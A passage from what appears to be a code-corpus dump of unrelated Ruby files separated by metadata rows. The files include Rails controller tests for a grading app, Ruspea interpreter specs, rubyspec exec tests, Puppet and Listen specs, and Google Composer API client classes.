ActiveModel::Errors.any_instance.stubs(:full_messages).returns([SAMPLE_ERR_MSG])
get_as @admin, :update_mark, params: { assignment_id: @assignment.id, submission_id: 1, id: @mark.result.id,
mark_id: 1, mark: 1 }
assert_response :bad_request
assert_match Regexp.new(SAMPLE_ERR_MSG), @response.body
end
should 'without save error' do
get_as @admin, :update_mark, params: { assignment_id: @assignment.id, submission_id: 1, id: @mark.result.id,
mark_id: @mark.id, mark: 1 },
format: :js
assert_response :success
end
should 'GET on :view_marks' do
get_as @admin, :view_marks, params: { assignment_id: @assignment.id, submission_id: @submission.id,
id: @result.id }
assert_response 200
end
should 'GET on :add_extra_mark' do
get_as @admin, :add_extra_mark, params: { assignment_id: 1, submission_id: @submission.id,
id: @submission.get_latest_result.id },
format: :js
assert_not_nil assigns :result
assert render_template 'results/marker/add_extra_mark'
assert_response :success
end
context 'POST on :add_extra_mark' do
should 'with save error' do
extra_mark = ExtraMark.new
ExtraMark.expects(:new).once.returns(extra_mark)
extra_mark.expects(:save).once.returns(false)
post_as @admin, :add_extra_mark, params: { assignment_id: 1, submission_id: @submission.id,
id: @submission.get_latest_result.id,
extra_mark: { extra_mark: 1 } },
format: :js
assert_not_nil assigns :result
assert_not_nil assigns :extra_mark
assert_response :success
end
should 'without save error' do
@submission.get_latest_result.update_total_mark
@old_total_mark = @submission.get_latest_result.total_mark
post_as @admin, :add_extra_mark, params: { assignment_id: 1, submission_id: @submission.id,
id: @submission.get_latest_result.id,
extra_mark: { extra_mark: 1 } },
format: :js
assert_not_nil assigns :result
assert_not_nil assigns :extra_mark
assert render_template 'results/marker/insert_extra_mark'
assert_response :success
@submission.get_latest_result.reload
assert_equal @old_total_mark + 1, @submission.get_latest_result.total_mark
end
end
end
should 'GET on :remove_extra_mark' do
@result = Result.make
(3..4).each do |extra_mark_value|
@extra_mark = ExtraMark.new
@extra_mark.unit = ExtraMark::POINTS
@extra_mark.result = @result
@extra_mark.extra_mark = extra_mark_value
assert @extra_mark.save
end
@result.update_total_mark
@old_total_mark = @result.total_mark
get_as @admin,
:remove_extra_mark,
params: { assignment_id: 1, submission_id: 1, id: @extra_mark.id },
format: :js
assert_equal true, flash.empty?
assert_not_nil assigns :result
assert render_template 'results/marker/remove_extra_mark'
assert_response :success
@result.reload
assert_equal @old_total_mark - @extra_mark.extra_mark, @result.total_mark
end
should 'POST on :update_overall_comment' do
@result = Result.make
@overall_comment = 'A new overall comment!'
post_as @admin,
:update_overall_comment,
params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id,
result: { overall_comment: @overall_comment } }
@result.reload
assert_equal @result.overall_comment, @overall_comment
end
end
end
end # An authenticated and authorized admin doing a
context 'A TA' do
{setup_ta_flexible: 'flexible',
setup_ta_rubric: 'rubric'}.each do |setup_method, criterion_type|
context "Using #{criterion_type} and doing a" do
setup do
@ta = Ta.make
@assignment = Assignment.make
@grouping = Grouping.make(assignment: @assignment)
@submission = Submission.make(grouping: @grouping)
@result = @grouping.submissions.first.get_latest_result
end
should 'GET on :edit' do
result = Result.make
get_as @ta,
:edit,
assignment_id: @assignment.id,
submission_id: 1,
id: result.id
assert_equal true, flash.empty?
assert render_template :edit
assert_response :success
end
context 'GET on :next_grouping' do
should 'when current grouping has submission' do
result = Result.make
grouping = Grouping.make
Grouping.any_instance.stubs(:has_submission).returns(true)
get_as @ta,
:next_grouping,
assignment_id: @assignment.id,
submission_id: 1,
grouping_id: grouping.id,
id: result.id
assert_response :redirect
end
should 'when current grouping has no submission' do
result = Result.make
grouping = Grouping.make
Grouping.any_instance.stubs(:has_submission).returns(false)
get_as @ta,
:next_grouping,
assignment_id: @assignment.id,
submission_id: 1,
grouping_id: grouping.id,
id: result.id
assert_response :redirect
end
end
should 'GET on :set_released_to_students' do
result = Result.make
grouping = Grouping.make
get_as @ta,
:set_released_to_students,
assignment_id: 1,
submission_id: 1,
grouping_id: grouping.id,
id: result.id
assert_response :missing
assert render_template 404
end
should 'GET on :toggle_marking_state' do
result = Result.make
grouping = Grouping.make
get_as @ta,
:toggle_marking_state,
format: :js,
assignment_id: @assignment.id,
submission_id: 1,
grouping_id: grouping.id,
id: result.id
assert_response :success
assert_not_nil assigns :result
end
context 'GET on :download' do
setup do
@file = SubmissionFile.new
end
should 'without file error' do
@file.expects(:filename).once.returns('filename')
@file.expects(:is_supported_image?).once.returns(false)
@file.expects(:retrieve_file).once.returns('file content')
SubmissionFile.stubs(:find).returns(@file)
get_as @ta,
:download,
assignment_id: 1,
submission_id: 1,
id: 1,
select_file_id: 1
assert_equal true, flash.empty?
assert_equal 'application/octet-stream', response.header['Content-Type']
assert_response :success
assert_equal 'file content', @response.body
end
should 'with file error' do
submission = Submission.make
result = Result.make
submission.expects(:get_latest_result).once.returns(result)
@file.expects(:submission).twice.returns(submission)
@file.expects(:retrieve_file).once.raises(
Exception.new(SAMPLE_ERR_MSG))
SubmissionFile.stubs(:find).returns(@file)
get_as @ta,
:download,
assignment_id: 1,
submission_id: 1,
id: 1,
select_file_id: 1
assert_equal flash[:file_download_error], SAMPLE_ERR_MSG
assert_response :redirect
end
should 'with supported image to be displayed inside browser' do
@file.expects(:filename).once.returns('filename.supported_image')
@file.expects(:is_supported_image?).once.returns(true)
@file.expects(:retrieve_file).returns('file content')
SubmissionFile.stubs(:find).returns(@file)
get_as @ta,
:download,
assignment_id: 1,
submission_id: 1,
id: 1,
select_file_id: 1,
show_in_browser: true
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'image'
assert_response :success
assert_equal 'file content', @response.body
end
end
context 'GET on :update_mark' do
setup do
@mark = Mark.make
end
should 'fails validation' do
ActiveModel::Errors.any_instance.stubs(:full_messages).returns([SAMPLE_ERR_MSG])
get_as @ta,
:update_mark,
format: :js,
assignment_id: @assignment.id,
submission_id: 1,
id: @mark.result.id,
mark_id: @mark.id,
mark: 'something'
assert_match "0.0,0.0,0.0", @response.body
end
should 'without save error' do
get_as @ta,
:update_mark,
format: :js,
assignment_id: @assignment.id,
submission_id: 1,
id: @mark.result.id,
mark_id: @mark.id,
mark: 1
assert render_template 'results/marker/_update_mark.rjs'
assert_response :success
end
end # -- GET on :update_mark
should 'GET on :view_marks' do
get_as @ta,
:view_marks,
assignment_id: @assignment.id,
submission_id: @submission.id,
id: @result.id
assert_response 200
end # -- GET on :view_marks
should 'GET on :add_extra_mark' do
incomplete_result = Result.make
get_as @ta,
:add_extra_mark,
format: :js,
assignment_id: 1,
submission_id: 1,
id: incomplete_result.id
assert_not_nil assigns :result
assert render_template 'results/marker/add_extra_mark'
assert_response :success
end
context 'POST on :add_extra_mark' do
setup do
@incomplete_result = Result.make
end
should 'with save error' do
extra_mark = ExtraMark.new
ExtraMark.expects(:new).once.returns(extra_mark)
extra_mark.expects(:save).once.returns(false)
post_as @ta,
:add_extra_mark,
format: :js,
assignment_id: 1,
submission_id: 1,
id: @incomplete_result.id,
extra_mark: {extra_mark: 1}
assert_not_nil assigns :result
assert_not_nil assigns :extra_mark
assert render_template 'results/marker/add_extra_mark_error'
assert_response :success
end # -- with save error
should 'without save error' do
@incomplete_result.update_total_mark
@old_total_mark = @incomplete_result.total_mark
post_as @ta,
:add_extra_mark,
format: :js,
assignment_id: 1,
submission_id: 1,
id: @incomplete_result.id,
extra_mark: {extra_mark: 1}
assert_not_nil assigns :result
assert_not_nil assigns :extra_mark
assert render_template 'results/marker/insert_extra_mark'
assert_response :success
@incomplete_result.reload
assert_equal @old_total_mark + 1, @incomplete_result.total_mark
end
end
should 'GET on :remove_extra_mark' do
# create and save extra marks
@result = Result.make
(3..4).each do |extra_mark_value|
@extra_mark = ExtraMark.new
@extra_mark.unit = ExtraMark::POINTS
@extra_mark.result = @result
@extra_mark.extra_mark = extra_mark_value
assert @extra_mark.save
end
@result.update_total_mark
@old_total_mark = @result.total_mark
get_as @ta,
:remove_extra_mark,
format: :js,
assignment_id: 1,
submission_id: 1,
id: @extra_mark.id
assert_equal true, flash.empty?
assert_not_nil assigns :result
assert render_template 'results/marker/remove_extra_mark'
assert_response :success
@result.reload
assert_equal @old_total_mark - @extra_mark.extra_mark,
@result.total_mark
end
should 'POST on :update_overall_comment' do
@overall_comment = 'A new overall comment!'
@result = Result.make
post_as @ta,
:update_overall_comment,
assignment_id: @assignment.id,
submission_id: 1,
id: @result.id,
result: {overall_comment: @overall_comment}
@result.reload
assert_equal @result.overall_comment, @overall_comment
end
end
end
end # An authenticated and authorized TA doing a
end
| 42.33815 | 120 | 0.566592 |
28fd43f16db8935a87bd01410d0b407ac42d3363 | 3,914 | module Ruspea::Language
RSpec.describe Core do
subject(:core) { described_class.new }
let(:reader) { Ruspea::Interpreter::Reader.new }
let(:evaler) { Ruspea::Interpreter::Evaler.new }
let(:list) { Ruspea::Runtime::List }
let(:sym) { Ruspea::Runtime::Sym }
let(:form) { Ruspea::Interpreter::Form }
let(:user_env) { Ruspea::Runtime::Env.new(core) }
context "quote" do
it "allows quotation of symbols" do
# (quote omg)
quotation = form.new(list.create(
form.new(sym.new("quote")),
form.new(sym.new("omg"))
))
result = evaler.call(quotation, context: core)
expect(result).to eq sym.new("omg")
end
it "allows quotation of lists" do
# (quote (1 2))
quotation = form.new(list.create(
form.new(sym.new("quote")),
form.new(
list.create(1, 2)
)
))
result = evaler.call(quotation, context: core)
expect(result).to eq list.create(1, 2)
end
end
context "def" do
it "defines a value associated with a symbol in the caller context" do
definition = form.new(list.create(
form.new(sym.new("def")),
form.new(sym.new("lol")),
form.new(420)
))
user_env = Ruspea::Runtime::Env.new(core)
evaler.call(definition, context: user_env)
expect(user_env.lookup(Ruspea::Runtime::Sym.new("lol"))).to eq 420
# ensure the external context is not poluted:
expect {
core.lookup(Ruspea::Runtime::Sym.new("lol"))
}.to raise_error Ruspea::Error::Resolution
end
end
context "cond" do
it "returns evaluates the expression for the first 'true' tuple" do
code = <<~code
(cond
(false 1)
(false 2)
(false 3)
(true (def lol 420) lol)
(true 5))
code
_, forms = reader.call(code)
expect(evaler.call(forms.last, context: user_env)).to eq 420
end
it "returns nil if no test is 'true'" do
code = <<~code
(cond
(false 1)
(false 2)
(false 3))
code
_, forms = reader.call(code)
expect(evaler.call(forms.last, context: user_env)).to eq nil
end
end
context "::" do
it "constanize single elements" do
_, forms = reader.call("(:: Kernel)")
expect(evaler.call(forms.first, context: user_env)).to eq Kernel
end
it "constanize namespaced elements" do
_, forms = reader.call("(:: Ruspea::Runtime::List)")
expect(evaler.call(forms.first, context: user_env)).to eq list
end
end
context "." do
it "sends a method to any object" do
_, forms = reader.call('(. "lol" upcase)')
expect(evaler.call(forms.first, context: user_env)).to eq "LOL"
end
it "sends parameters to a object" do
code = [
'(def str "bbq")',
'(. "lol" << str)',
"(. 1 + 1)",
"(. [] << 'bbq)"
].join("\n")
_, forms = reader.call(code)
expect(evaler.call(forms, context: user_env)).to eq [
"bbq", "lolbbq", 2, [sym.new("bbq")]]
end
it "sends parameters to objects" do
code = [
'(def str "bbq")',
'(. (:: String) new "lol")',
'(. (. (:: Array) new) << (. 1 + 2))',
'(. (:: Kernel) print str)'
].join("\n")
_, forms = reader.call(code)
result = nil
expect {
result = evaler.call(forms, context: user_env)
}.to output("bbq").to_stdout
expect(result).to eq ["bbq", "lol", [3], nil]
end
end
context "rsp core" do
it "loads rsp core" do
expect { user_env.lookup(sym.new("puts")) }.to_not raise_error
end
end
end
end
| 27.370629 | 76 | 0.525805 |
f8bd52e8f6a38b12a0bdca41cf7227b114f8bc39 | 448 | class CreateInfoSources < ActiveRecord::Migration
def self.up
create_table :info_sources, :force=>true do |t|
t.column :code, :string, :null=>false
t.column :title, :string
t.column :agent, :string
t.column :date_published, :date
t.timestamps
end
add_index :info_sources, :code, :unique=>true
end
def self.down
remove_index :info_sources, :code
drop_table :info_sources
end
end | 23.578947 | 51 | 0.65625 |
5da14740f6bc7ff5cb7c62fe4d55e5a31d660bc6 | 726 | require File.dirname(__FILE__) + '/../../spec_helper'
require File.dirname(__FILE__) + '/fixtures/classes'
describe "Kernel#exec" do
it "is a private method" do
Kernel.should have_private_instance_method(:exec)
end
it "raises a SystemCallError if cmd cannot execute" do
lambda { exec "" }.should raise_error(SystemCallError)
end
it 'can call bat files' do
ruby_exe("exec '#{File.dirname(__FILE__) + "/fixtures/comspec.bat"} success'").chomp.should == 'success'
end
it 'can call cmd files' do
ruby_exe("exec '#{File.dirname(__FILE__) + "/fixtures/comspec.cmd"} success'").chomp.should == 'success'
end
end
describe "Kernel.exec" do
it "needs to be reviewed for spec completeness"
end
| 29.04 | 108 | 0.702479 |
18d8ccae165a91f8f1a4e7b2e8d15d94fdbce6ae | 1,596 | require 'spec_helper'
describe 'ironic::inspector::cors' do
shared_examples_for 'ironic inspector cors' do
it 'configure cors default params' do
is_expected.to contain_oslo__cors('ironic_inspector_config').with(
:allowed_origin => '<SERVICE DEFAULT>',
:allow_credentials => '<SERVICE DEFAULT>',
:expose_headers => '<SERVICE DEFAULT>',
:max_age => '<SERVICE DEFAULT>',
:allow_methods => '<SERVICE DEFAULT>',
:allow_headers => '<SERVICE DEFAULT>')
end
context 'with specific parameters' do
let :params do
{ :allowed_origin => '*',
:allow_credentials => true,
:expose_headers => 'Content-Language,Expires',
:max_age => 3600,
:allow_methods => 'GET,POST,PUT,DELETE,OPTIONS',
:allow_headers => 'Content-Type,Cache-Control',
}
end
it 'configure cors params' do
is_expected.to contain_oslo__cors('ironic_inspector_config').with(
:allowed_origin => '*',
:allow_credentials => true,
:expose_headers => 'Content-Language,Expires',
:max_age => 3600,
:allow_methods => 'GET,POST,PUT,DELETE,OPTIONS',
:allow_headers => 'Content-Type,Cache-Control')
end
end
end
on_supported_os({
:supported_os => OSDefaults.get_supported_os
}).each do |os,facts|
context "on #{os}" do
let (:facts) do
facts.merge!(OSDefaults.get_facts())
end
it_configures 'ironic inspector cors'
end
end
end
| 30.113208 | 74 | 0.592105 |
871a311e467657e1efad63e97d12083f3e545819 | 621 | class CreateSchoolBattles < ActiveRecord::Migration[5.1]
def change
opts = { id: :uuid, default: -> { "uuid_generate_v4()" } }
create_table :school_battles, opts do |t|
t.string :event_name, null: false, default: ''
t.string :course, null: false
t.date :started_date, null: false
t.date :finished_date, null: false
t.timestamps
end
create_table :battle_schools, opts do |t|
t.uuid :school_battle_id, null: false
t.uuid :school_id, null: false
t.timestamps
end
add_index :battle_schools, [:school_battle_id, :school_id], unique: true
end
end
| 27 | 76 | 0.657005 |
612459e104f3a491395f22a0d465991ac7c310e0 | 2,207 | require 'spec_helper'
describe Listen do
describe '#to' do
let(:listener) { mock(Listen::Listener) }
let(:listener_class) { Listen::Listener }
before { listener_class.stub(:new => listener) }
context 'with one path to listen to' do
context 'without options' do
it 'creates an instance of Listener' do
listener_class.should_receive(:new).with('/path')
described_class.to('/path')
end
end
context 'with options' do
it 'creates an instance of Listener with the passed params' do
listener_class.should_receive(:new).with('/path', :filter => '**/*')
described_class.to('/path', :filter => '**/*')
end
end
context 'without a block' do
it 'returns the listener' do
described_class.to('/path', :filter => '**/*').should eq listener
end
end
context 'with a block' do
it 'starts the listener after creating it' do
listener.should_receive(:start)
described_class.to('/path', :filter => '**/*') { |modified, added, removed| }
end
end
end
context 'with multiple paths to listen to' do
context 'without options' do
it 'creates an instance of Listener' do
listener_class.should_receive(:new).with('path1', 'path2')
described_class.to('path1', 'path2')
end
end
context 'with options' do
it 'creates an instance of Listener with the passed params' do
listener_class.should_receive(:new).with('path1', 'path2', :filter => '**/*')
described_class.to('path1', 'path2', :filter => '**/*')
end
end
context 'without a block' do
it 'returns a Listener instance created with the passed params' do
described_class.to('path1', 'path2', :filter => '**/*').should eq listener
end
end
context 'with a block' do
it 'starts a Listener instance after creating it with the passed params' do
listener.should_receive(:start)
described_class.to('path1', 'path2', :filter => '**/*') { |modified, added, removed| }
end
end
end
end
end
| 32.455882 | 96 | 0.590847 |
2188888069d6ca87f1593c4c206d847333eb6b34 | 574 | # typed: true
module KubeDSL::DSL::V1
class PodTemplateSpec < ::KubeDSL::DSLObject
object_field(:metadata) { KubeDSL::DSL::Meta::V1::ObjectMeta.new }
object_field(:spec) { KubeDSL::DSL::V1::PodSpec.new }
validates :metadata, object: { kind_of: KubeDSL::DSL::Meta::V1::ObjectMeta }
validates :spec, object: { kind_of: KubeDSL::DSL::V1::PodSpec }
def serialize
{}.tap do |result|
result[:metadata] = metadata.serialize
result[:spec] = spec.serialize
end
end
def kind_sym
:pod_template_spec
end
end
end
| 24.956522 | 80 | 0.646341 |
ed2c04c4b09bcd85afde8e026bfa902b7d27903f | 304 | # Copyright (c) Universidade Federal Fluminense (UFF).
# This file is part of SAPOS. Please, consult the license terms in the LICENSE file.
require 'test_helper'
class EnrollmentStatusTest < ActiveSupport::TestCase
# Replace this with your real tests.
test "the truth" do
assert true
end
end
| 25.333333 | 84 | 0.753289 |
1adafeb7706d5ea582873a48c98c1ed845d60370 | 500 | # frozen_string_literal: true
require 'vk/api/responses'
module Vk
module API
class Video < Vk::Schema::Namespace
module Responses
# @see https://github.com/VKCOM/vk-api-schema/blob/master/objects.json
class AddResponse < Vk::Schema::Response
# @return [API::Base::OkResponse] @see https://github.com/VKCOM/vk-api-schema/blob/master/objects.json
attribute :response, API::Base::OkResponse.optional.default(nil)
end
end
end
end
end
| 29.411765 | 112 | 0.67 |
b967130baacdc8e1ed477b778a42c825df23e89f | 628 | # Test-only pub/sub API that sense whether events have been published without
# actually contacting a remote service.
class SpyPubSubApi
attr_reader :publish_history
def initialize
@publish_history = []
end
# Pretends to publish an event to a a channel using the Pub/Sub system.
#
# @param [String] channel a single channel name that the event is to be published on
# @param [String] event - the name of the event to be triggered
# @param [Hash] data - the data to be sent with the event
def publish(channel, event, data)
@publish_history.push({channel: channel, event: event, data: data})
end
end
| 33.052632 | 86 | 0.729299 |
f82ab71b6ce08977c7c5092eae93de1118e44b40 | 2,012 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module XPack
module API
module Security
module Actions
# Change the password of a user
#
# @option arguments [String] :username The username of the user to change the password for
# @option arguments [Hash] :body the new password for the user (*Required*)
# @option arguments [Boolean] :refresh Refresh the index after performing the operation
#
# @see https://www.elastic.co/guide/en/x-pack/current/security-api-change-password.html
#
def change_password(arguments={})
raise ArgumentError, "Required argument 'body' missing" unless arguments[:body]
valid_params = [ :refresh ]
arguments = arguments.clone
username = arguments.delete(:username)
method = Elasticsearch::API::HTTP_PUT
path = Elasticsearch::API::Utils.__pathify "_xpack/security/user/", username, "/_password"
params = Elasticsearch::API::Utils.__validate_and_extract_params arguments, valid_params
body = arguments[:body]
perform_request(method, path, params, body).body
end
end
end
end
end
end
| 38.692308 | 104 | 0.680915 |
ed40c33ad23bcf20621058f9c5645594926a3322 | 1,184 | # Unlight
# Copyright(c)2019 CPA
# This software is released under the MIT License.
# http://opensource.org/licenses/mit-license.php
module Unlight
# パーツのインベントリクラス
class MonsterTreasureInventory < Sequel::Model
# 他クラスのアソシエーション
many_to_one :cpu_card_data # アバターを持つ
many_to_one :treasure_data # アバターパーツを持つ
plugin :validation_class_methods
plugin :hook_class_methods
# インサート時の前処理
before_create do
self.created_at = Time.now.utc
end
# インサートとアップデート時の前処理
before_save do
self.updated_at = Time.now.utc
end
SLOTS2REWARD = [Unlight::Reward::WEAPON_CARD, 0, Unlight::Reward::EVENT_CARD]
def get_treasure
ret = { step: 0, item: [0, 0, 0] }
t = treasure_data
if t
case t.treasure_type
when TG_CHARA_CARD
ret = { step: step, item: [Unlight::Reward::RANDOM_CARD, t.value, num] }
when TG_SLOT_CARD
ret = { step: step, item: [SLOTS2REWARD[t.slot_type], t.value, num] } unless (SLOTS2REWARD[t.slot_type]).zero?
when TG_AVATAR_ITEM
ret = { step: step, item: [Unlight::Reward::ITEM, t.value, num] }
end
end
ret
end
end
end
| 26.311111 | 120 | 0.650338 |
f852e6071e626a5c3e38605f3d7e858c23fae9f3 | 1,053 | module Nokogiri
module XML
class Node
###
# Save options for serializing nodes
class SaveOptions
# Format serialized xml
FORMAT = 1
# Do not include delcarations
NO_DECLARATION = 2
# Do not include empty tags
NO_EMPTY_TAGS = 4
# Do not save XHTML
NO_XHTML = 8
# Save as XHTML
AS_XHTML = 16
# Save as XML
AS_XML = 32
# Save as HTML
AS_HTML = 64
# Integer representation of the SaveOptions
attr_reader :options
# Create a new SaveOptions object with +options+
def initialize options = 0; @options = options; end
constants.each do |constant|
class_eval %{
def #{constant.downcase}
@options |= #{constant}
self
end
def #{constant.downcase}?
#{constant} & @options == #{constant}
end
}
end
end
end
end
end
| 24.488372 | 59 | 0.496676 |
e96cd1c858e9890ffdf6fc3c74702d241a835529 | 50,204 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module ComposerV1beta1
# Allowed IP range with user-provided description.
class AllowedIpRange
include Google::Apis::Core::Hashable
# Optional. User-provided description. It must contain at most 300 characters.
# Corresponds to the JSON property `description`
# @return [String]
attr_accessor :description
# IP address or range, defined using CIDR notation, of requests that this rule
# applies to. Examples: `192.168.1.1` or `192.168.0.0/16` or `2001:db8::/32` or `
# 2001:0db8:0000:0042:0000:8a2e:0370:7334`. IP range prefixes should be properly
# truncated. For example, `1.2.3.4/24` should be truncated to `1.2.3.0/24`.
# Similarly, for IPv6, `2001:db8::1/32` should be truncated to `2001:db8::/32`.
# Corresponds to the JSON property `value`
# @return [String]
attr_accessor :value
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@description = args[:description] if args.key?(:description)
@value = args[:value] if args.key?(:value)
end
end
# The configuration of Cloud SQL instance that is used by the Apache Airflow
# software.
class DatabaseConfig
include Google::Apis::Core::Hashable
# Optional. Cloud SQL machine type used by Airflow database. It has to be one of:
# db-n1-standard-2, db-n1-standard-4, db-n1-standard-8 or db-n1-standard-16. If
# not specified, db-n1-standard-2 will be used.
# Corresponds to the JSON property `machineType`
# @return [String]
attr_accessor :machine_type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@machine_type = args[:machine_type] if args.key?(:machine_type)
end
end
# Represents a whole or partial calendar date, such as a birthday. The time of
# day and time zone are either specified elsewhere or are insignificant. The
# date is relative to the Gregorian Calendar. This can represent one of the
# following: * A full date, with non-zero year, month, and day values * A month
# and day value, with a zero year, such as an anniversary * A year on its own,
# with zero month and day values * A year and month value, with a zero day, such
# as a credit card expiration date Related types are google.type.TimeOfDay and `
# google.protobuf.Timestamp`.
class Date
include Google::Apis::Core::Hashable
# Day of a month. Must be from 1 to 31 and valid for the year and month, or 0 to
# specify a year by itself or a year and month where the day isn't significant.
# Corresponds to the JSON property `day`
# @return [Fixnum]
attr_accessor :day
# Month of a year. Must be from 1 to 12, or 0 to specify a year without a month
# and day.
# Corresponds to the JSON property `month`
# @return [Fixnum]
attr_accessor :month
# Year of the date. Must be from 1 to 9999, or 0 to specify a date without a
# year.
# Corresponds to the JSON property `year`
# @return [Fixnum]
attr_accessor :year
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@day = args[:day] if args.key?(:day)
@month = args[:month] if args.key?(:month)
@year = args[:year] if args.key?(:year)
end
end
# A generic empty message that you can re-use to avoid defining duplicated empty
# messages in your APIs. A typical example is to use it as the request or the
# response type of an API method. For instance: service Foo ` rpc Bar(google.
# protobuf.Empty) returns (google.protobuf.Empty); ` The JSON representation for
# `Empty` is empty JSON object ````.
class Empty
include Google::Apis::Core::Hashable
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
end
end
# The encryption options for the Composer environment and its dependencies.
class EncryptionConfig
include Google::Apis::Core::Hashable
# Optional. Customer-managed Encryption Key available through Google's Key
# Management Service. Cannot be updated. If not specified, Google-managed key
# will be used.
# Corresponds to the JSON property `kmsKeyName`
# @return [String]
attr_accessor :kms_key_name
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@kms_key_name = args[:kms_key_name] if args.key?(:kms_key_name)
end
end
# An environment for running orchestration tasks.
class Environment
include Google::Apis::Core::Hashable
# Configuration information for an environment.
# Corresponds to the JSON property `config`
# @return [Google::Apis::ComposerV1beta1::EnvironmentConfig]
attr_accessor :config
# Output only. The time at which this environment was created.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Optional. User-defined labels for this environment. The labels map can contain
# no more than 64 entries. Entries of the labels map are UTF8 strings that
# comply with the following restrictions: * Keys must conform to regexp: \p`Ll`\
# p`Lo``0,62` * Values must conform to regexp: [\p`Ll`\p`Lo`\p`N`_-]`0,63` *
# Both keys and values are additionally constrained to be <= 128 bytes in size.
# Corresponds to the JSON property `labels`
# @return [Hash<String,String>]
attr_accessor :labels
# The resource name of the environment, in the form: "projects/`projectId`/
# locations/`locationId`/environments/`environmentId`" EnvironmentId must start
# with a lowercase letter followed by up to 63 lowercase letters, numbers, or
# hyphens, and cannot end with a hyphen.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The current state of the environment.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# Output only. The time at which this environment was last modified.
# Corresponds to the JSON property `updateTime`
# @return [String]
attr_accessor :update_time
# Output only. The UUID (Universally Unique IDentifier) associated with this
# environment. This value is generated when the environment is created.
# Corresponds to the JSON property `uuid`
# @return [String]
attr_accessor :uuid
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@config = args[:config] if args.key?(:config)
@create_time = args[:create_time] if args.key?(:create_time)
@labels = args[:labels] if args.key?(:labels)
@name = args[:name] if args.key?(:name)
@state = args[:state] if args.key?(:state)
@update_time = args[:update_time] if args.key?(:update_time)
@uuid = args[:uuid] if args.key?(:uuid)
end
end
# Configuration information for an environment.
class EnvironmentConfig
include Google::Apis::Core::Hashable
# Output only. The URI of the Apache Airflow Web UI hosted within this
# environment (see [Airflow web interface](/composer/docs/how-to/accessing/
# airflow-web-interface)).
# Corresponds to the JSON property `airflowUri`
# @return [String]
attr_accessor :airflow_uri
# Output only. The Cloud Storage prefix of the DAGs for this environment.
# Although Cloud Storage objects reside in a flat namespace, a hierarchical file
# tree can be simulated using "/"-delimited object name prefixes. DAG objects
# for this environment reside in a simulated directory with the given prefix.
# Corresponds to the JSON property `dagGcsPrefix`
# @return [String]
attr_accessor :dag_gcs_prefix
# The configuration of Cloud SQL instance that is used by the Apache Airflow
# software.
# Corresponds to the JSON property `databaseConfig`
# @return [Google::Apis::ComposerV1beta1::DatabaseConfig]
attr_accessor :database_config
# The encryption options for the Composer environment and its dependencies.
# Corresponds to the JSON property `encryptionConfig`
# @return [Google::Apis::ComposerV1beta1::EncryptionConfig]
attr_accessor :encryption_config
# Output only. The Kubernetes Engine cluster used to run this environment.
# Corresponds to the JSON property `gkeCluster`
# @return [String]
attr_accessor :gke_cluster
# The configuration settings for Cloud Composer maintenance window. The
# following example: ` "startTime":"2019-08-01T01:00:00Z" "endTime":"2019-08-
# 01T07:00:00Z" "recurrence":"FREQ=WEEKLY;BYDAY=TU,WE" ` would define a
# maintenance window between 01 and 07 hours UTC during each Tuesday and
# Wednesday.
# Corresponds to the JSON property `maintenanceWindow`
# @return [Google::Apis::ComposerV1beta1::MaintenanceWindow]
attr_accessor :maintenance_window
# The configuration information for the Kubernetes Engine nodes running the
# Apache Airflow software.
# Corresponds to the JSON property `nodeConfig`
# @return [Google::Apis::ComposerV1beta1::NodeConfig]
attr_accessor :node_config
# The number of nodes in the Kubernetes Engine cluster that will be used to run
# this environment.
# Corresponds to the JSON property `nodeCount`
# @return [Fixnum]
attr_accessor :node_count
# The configuration information for configuring a Private IP Cloud Composer
# environment.
# Corresponds to the JSON property `privateEnvironmentConfig`
# @return [Google::Apis::ComposerV1beta1::PrivateEnvironmentConfig]
attr_accessor :private_environment_config
# Specifies the selection and configuration of software inside the environment.
# Corresponds to the JSON property `softwareConfig`
# @return [Google::Apis::ComposerV1beta1::SoftwareConfig]
attr_accessor :software_config
# The configuration settings for the Airflow web server App Engine instance.
# Corresponds to the JSON property `webServerConfig`
# @return [Google::Apis::ComposerV1beta1::WebServerConfig]
attr_accessor :web_server_config
# Network-level access control policy for the Airflow web server.
# Corresponds to the JSON property `webServerNetworkAccessControl`
# @return [Google::Apis::ComposerV1beta1::WebServerNetworkAccessControl]
attr_accessor :web_server_network_access_control
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@airflow_uri = args[:airflow_uri] if args.key?(:airflow_uri)
@dag_gcs_prefix = args[:dag_gcs_prefix] if args.key?(:dag_gcs_prefix)
@database_config = args[:database_config] if args.key?(:database_config)
@encryption_config = args[:encryption_config] if args.key?(:encryption_config)
@gke_cluster = args[:gke_cluster] if args.key?(:gke_cluster)
@maintenance_window = args[:maintenance_window] if args.key?(:maintenance_window)
@node_config = args[:node_config] if args.key?(:node_config)
